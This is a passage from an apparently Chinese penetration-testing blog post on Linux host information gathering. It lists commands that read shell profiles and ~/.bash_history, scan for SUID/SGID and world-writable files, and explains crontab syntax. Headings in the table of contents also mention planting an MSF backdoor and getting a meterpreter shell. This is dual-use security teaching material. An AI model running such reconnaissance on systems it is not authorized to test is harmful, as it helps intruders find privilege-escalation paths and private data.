<h4 id="8-文件系统"><a href="#8-文件系统" class="headerlink" title="8 - 文件系统"></a>8 - 文件系统</h4><figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cat</span> /etc/profile		// /etc/profile 包含Linux系统环境和启动程序。 它被所有的用户使</span><br><span class="line">			  	   用于bash，ksh，sh shell。</span><br><span class="line"></span><br><span class="line"><span class="built_in">cat</span> /etc/bashrc			// /etc/bashrc或者/etc/bash.bashrc是全系统的bash每个交互式</span><br><span class="line">			  	   shell启动文件。是使用系统广泛的功能和别名。</span><br><span class="line"></span><br><span class="line"><span class="built_in">cat</span> ~/.bash_profile		// 类似 /etc/profile, 但仅适用于当前用户</span><br><span class="line"></span><br><span class="line"><span class="built_in">cat</span> ~/.bash_history		//  打印当前用户bash命令的历史记录</span><br><span class="line"></span><br><span class="line"><span class="built_in">ls</span> <span class="literal">-al</span> /var/log/		// 列出所有日志文件</span><br><span class="line"></span><br><span class="line">find / <span class="literal">-perm</span> <span class="literal">-1000</span> <span class="literal">-type</span> d <span class="number">2</span>&gt;/dev/null	// 粘滞位 - 只有目录的所有者或文件的所有者可以在这里删</span><br><span class="line">			  		   除或重命名.</span><br><span class="line"></span><br><span class="line">find / <span class="literal">-perm</span> <span class="literal">-g</span>=s <span class="literal">-type</span> f <span class="number">2</span>&gt;/dev/null	// SGID（chmod <span class="number">2000</span>）-作为组运行，而不是启动它的用户。</span><br><span class="line"></span><br><span class="line">find / <span class="literal">-perm</span> <span class="literal">-u</span>=s <span class="literal">-type</span> f <span class="number">2</span>&gt;/dev/null	// SUID（chmod <span class="number">4000</span>）-作为所有者运行，而不是启动它的用户。</span><br><span class="line"></span><br><span class="line">find / ( <span class="literal">-perm</span> <span class="literal">-o</span> w <span class="literal">-perm</span> <span class="literal">-o</span> x ) <span class="literal">-type</span> d <span class="number">2</span>&gt;/dev/null		// 找出可写可执行的文件夹</span><br><span class="line"></span><br><span class="line">find / <span class="literal">-xdev</span> <span class="literal">-type</span> d ( <span class="literal">-perm</span> <span class="literal">-0002</span> <span class="literal">-a</span> ! <span class="literal">-perm</span> <span class="literal">-1000</span>) <span class="literal">-print</span>	// 找出可写的文件</span><br><span class="line"></span><br><span class="line">find /<span class="built_in">dir</span> <span class="literal">-xdev</span> ( <span class="literal">-nouser</span> <span class="literal">-o</span> <span class="literal">-nogroup</span> ) <span class="literal">-print</span>			// 找出不是所有者的文件</span><br></pre></td></tr></table></figure>

<h4 id="9-计划用户-crontab"><a href="#9-计划用户-crontab" class="headerlink" title="9 - 计划用户 - crontab"></a>9 - 计划用户 - crontab</h4><p>crond是linux下用来周期性的执行某种任务或等待处理某些事件的一个守护进程，当安装完成操作系统后，默认会 安装此服务 工具，并且会自动启动crond进程，crond进程每分钟会定期检查是否有要执行的任务，如果有要执行 的任务，则自动执行该任务。</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">crontab <span class="literal">-l</span> 				//显示当前用户crontab</span><br></pre></td></tr></table></figure>

<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">crontab [-<span class="type">u</span> <span class="type">username</span>] [-<span class="type">l</span>|-<span class="type">e</span>|-<span class="type">r</span>]</span><br><span class="line">参数：</span><br><span class="line"></span><br><span class="line"><span class="literal">-u</span>: 只有root才能进行这个任务，也即帮其他用户新建/删除crontab工作调度;</span><br><span class="line"></span><br><span class="line"><span class="literal">-e</span>: 编辑crontab 的工作内容;</span><br><span class="line"></span><br><span class="line"><span class="literal">-l</span>: 查阅crontab的工作内容;</span><br><span class="line"></span><br><span class="line"><span class="literal">-r</span>: 删除所有的crontab的工作内容，若仅要删除一项，请用<span class="literal">-e</span>去编辑。</span><br></pre></td></tr></table></figure>

<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">0</span>    <span class="number">12</span>   *   *   *    root /etc/init.d/smb restart</span><br><span class="line"><span class="comment">#分  时   日   月  周  |《==============命令行=======》|</span></span><br></pre></td></tr></table></figure>

<table>
<thead>
<tr>
<th>代表意义</th>
<th>分钟</th>
<th>小时</th>
<th>日期</th>
<th>月份</th>
<th>周</th>
<th>命令</th>
</tr>
</thead>
<tbody><tr>
<td>范围</td>
<td>0-59</td>
<td>0-23</td>
<td>1-31</td>
<td>1-12</td>
<td>0-7</td>
<td></td>
</tr>
</tbody></table>

    </div>
  <div>
  
    <div>
    
        <div style="text-align:center;color: #ccc;font-size:14px;">-------------本文结束<i class="fa fa-paw"></i>感谢您的阅读-------------</div>
    
</div>
  
</div>
    
    
    
        <div class="reward-container">
  <div></div>
  <button onclick="var qr = document.getElementById('qr'); qr.style.display = (qr.style.display === 'none') ? 'block' : 'none';">
    打赏
  </button>
  <div id="qr" style="display: none;">
      
      <div style="display: inline-block;">
        <img src="/images/wechatpay.png" alt="成殇Orz1 微信支付">
        <p>微信支付</p>
      </div>
      
      <div style="display: inline-block;">
        <img src="/images/alipay.png" alt="成殇Orz1 支付宝">
        <p>支付宝</p>
      </div>

  </div>
</div>

        

<div>
<ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者： </strong>成殇Orz1
  </li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    <a href="http://onlycare.github.io/2021/03/13/Linux%E4%B8%BB%E6%9C%BA%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/" title="Linux主机信息收集">http://onlycare.github.io/2021/03/13/Linux主机信息收集/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="noopener" target="_blank"><i class="fab fa-fw fa-creative-commons"></i>BY-NC-SA</a> 许可协议。转载请注明出处！
  </li>
</ul>
</div>


      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" rel="tag"><i class="fa fa-tags"></i>渗透测试</a>
              <a href="/tags/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/" rel="tag"><i class="fa fa-tags"></i>信息收集</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2021/03/04/Windows%E5%AF%86%E7%A0%81%E5%87%AD%E8%AF%81%E8%8E%B7%E5%8F%96/" rel="prev" title="Windows密码凭证获取">
      <i class="fa fa-chevron-left"></i> Windows密码凭证获取
    </a></div>
      <div class="post-nav-item">
    <a href="/2021/03/22/Windows%E4%B8%BB%E6%9C%BA%E6%8F%90%E6%9D%83/" rel="next" title="Windows提权">
      Windows提权 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%88%90%E6%AE%87Orz1"><span class="nav-text">成殇Orz1</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x00-Linux%E4%B8%BB%E6%9C%BA%E6%B8%97%E9%80%8F"><span class="nav-text">0x00 Linux主机渗透</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#MSF%E7%94%9F%E6%88%90LUNIX%E5%B9%B3%E5%8F%B0%E5%8F%AF%E6%89%A7%E8%A1%8C%E6%96%87%E4%BB%B6"><span class="nav-text">MSF生成LUNIX平台可执行文件</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#MSF%E5%BC%80%E5%90%AFhandler"><span class="nav-text">MSF开启handler</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E4%B8%8A%E4%BC%A0%E5%90%8E%E9%97%A8%E8%87%B3%E9%9D%B6%E6%9C%BA-tmp%E7%9B%AE%E5%BD%95%EF%BC%9A%E6%89%80%E6%9C%89%E7%94%A8%E6%88%B7%E3%80%81%E7%94%A8%E6%88%B7%E7%BB%84%E9%83%BD%E5%85%B7%E6%9C%89%E5%8F%AF%E5%86%99%E6%9D%83%E9%99%90"><span class="nav-text">上传后门至靶机 &#x2F;tmp目录：所有用户、用户组都具有可写权限</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E9%9D%B6%E6%9C%BA%E8%BF%90%E8%A1%8C%E5%90%8E%E9%97%A8%EF%BC%8C%E8%8E%B7%E5%8F%96meterpreter"><span class="nav-text">靶机运行后门，获取meterpreter</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#meterpreter%E8%8E%B7%E5%8F%96%E5%88%B0shell%E9%BB%98%E8%AE%A4%E6%98%AF-bin-sh"><span class="nav-text">meterpreter获取到shell默认是&#x2F;bin&#x2F;sh</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E5%8F%AF%E4%BB%A5%E4%BD%BF%E7%94%A8-python-c-%E2%80%9Cimport-pty-pty-spawn-%E2%80%98-bin-bash%E2%80%99-%E2%80%9D%E5%88%87%E6%8D%A2%E8%87%B3-bin-bash"><span class="nav-text">可以使用 python -c “import pty;pty.spawn(‘&#x2F;bin&#x2F;bash’);”切换至&#x2F;bin&#x2F;bash</span></a></li></ol></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x01-Linux%E4%B8%BB%E6%9C%BA%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="nav-text">0x01 Linux主机信息收集</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#1-%E7%B3%BB%E7%BB%9F%E6%9E%B6%E6%9E%84"><span class="nav-text">1 - 系统架构</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#2-%E8%BF%9B%E7%A8%8B"><span class="nav-text">2 - 进程</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#3-%E7%94%A8%E6%88%B7%E5%92%8C%E7%BB%84"><span class="nav-text">3 - 用户和组</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#4-SSH%E6%9C%8D%E5%8A%A1%E4%BF%A1%E6%81%AF"><span class="nav-text">4 - SSH服务信息</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#5-%E6%9C%8D%E5%8A%A1%E7%8A%B6%E6%80%81"><span class="nav-text">5 - 服务状态</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#6-%E5%AE%89%E5%85%A8-iptables"><span class="nav-text">6 - 安全 - iptables</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#7-%E7%BD%91%E7%BB%9C"><span class="nav-text">7 - 网络</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#8-%E6%96%87%E4%BB%B6%E7%B3%BB%E7%BB%9F"><span class="nav-text">8 - 文件系统</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#9-%E8%AE%A1%E5%88%92%E7%94%A8%E6%88%B7-crontab"><span class="nav-text">9 - 计划用户 - crontab</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="成殇Orz1"
      src="/images/2.png">
  <p class="site-author-name" itemprop="name">成殇Orz1</p>
  <div class="site-description" itemprop="description">菜鸡一枚</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">11</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">3</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">7</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/onlycare" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;onlycare" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="mailto:cshanng@gmail.com" title="E-Mail → mailto:cshanng@gmail.com" rel="noopener" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
  </div>
  <div class="cc-license motion-element" itemprop="license">
    <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" class="cc-opacity" rel="noopener" target="_blank"><img src="/images/cc-by-nc-sa.svg" alt="Creative Commons"></a>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">成殇Orz1</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-area"></i>
    </span>
      <span class="post-meta-item-text">站点总字数：</span>
    <span title="站点总字数">52k</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
      <span class="post-meta-item-text">站点阅读时长 &asymp;</span>
    <span title="站点阅读时长">47 分钟</span>
</div>



        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>

<script src="/js/bookmark.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"model":{"jsonPath":"/live2dw/assets/miku.model.json"},"display":{"position":"left","width":150,"height":300},"mobile":{"show":false},"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script></body>
</html>
<!--崩溃欺骗-->
<script type="text/javascript" src="/js/crash_cheat.js"></script>
